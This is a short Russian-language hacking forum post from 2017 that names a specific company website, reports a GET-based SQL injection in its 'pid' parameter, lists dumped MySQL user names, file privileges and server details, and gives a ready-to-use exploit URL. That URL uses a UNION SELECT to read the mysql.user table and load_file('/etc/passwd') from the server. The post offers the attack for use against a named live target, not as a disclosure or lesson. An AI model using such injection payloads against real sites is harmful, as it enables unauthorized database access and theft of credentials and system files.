Показать сообщение отдельно

  #276  
Старый 26.05.2017, 14:41
Печа
Guest
Сообщений: n/a
Провел на форуме:
14926

Репутация: 17
По умолчанию

Сайт:ene.com.tw

SQLi черз GET с чтением файла из файловой системы, уязвимый параметр pid

root:Y,root:Y,root:Y,:N,:N,enemysql:N,enemysql:Y.

enemysql@localhost:5.1.73:redhat-linux-gnu:x86_64:/var/log/mysqld.log.

Эксплоит:

Код:
Code:
http://www.ene.com.tw/english/ir/newsdetail.php?fid=14&pid=-1' union all select 1,2,3,group_concat(user,0x3a,file_priv),5,@@version,load_file('/etc/passwd'),8,9,10 from mysql.user --+
 
Ответить с цитированием